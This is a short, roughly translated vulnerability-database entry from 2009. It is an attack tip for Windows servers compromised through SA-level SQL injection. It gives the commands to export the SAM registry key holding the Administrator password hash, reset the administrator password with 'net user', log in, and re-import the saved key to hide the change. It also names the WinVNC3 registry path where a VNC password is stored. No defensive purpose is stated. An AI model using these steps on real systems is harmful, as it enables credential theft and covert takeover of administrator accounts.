The use of the registry read-hash-vulnerability warning-the black bar safety net

ID MYHACK58:62200922343
Type myhack58
Reporter 佚名
Modified 2009-02-28T00:00:00


SA permissions of the injection point,we can use the system comes with some command to read the registry key information. sa is the default SYSTEM permissions that can be read in the sam key. regedit-e c:\1.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 win2K reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg win2003 Read out after,we can directly change the admin password to login: net user administrator test With the administrator login. Runs out the machine after reg import c:\test.reg There is no need to clone. But to note,be sure to find the corresponding sid. HKEY_CURRENT_USER\Software\ORL\WinVNC3 HKCU\Software\ORL\WinVNC3\Password

Chinadu` Blog Copyright © 2 0 0 8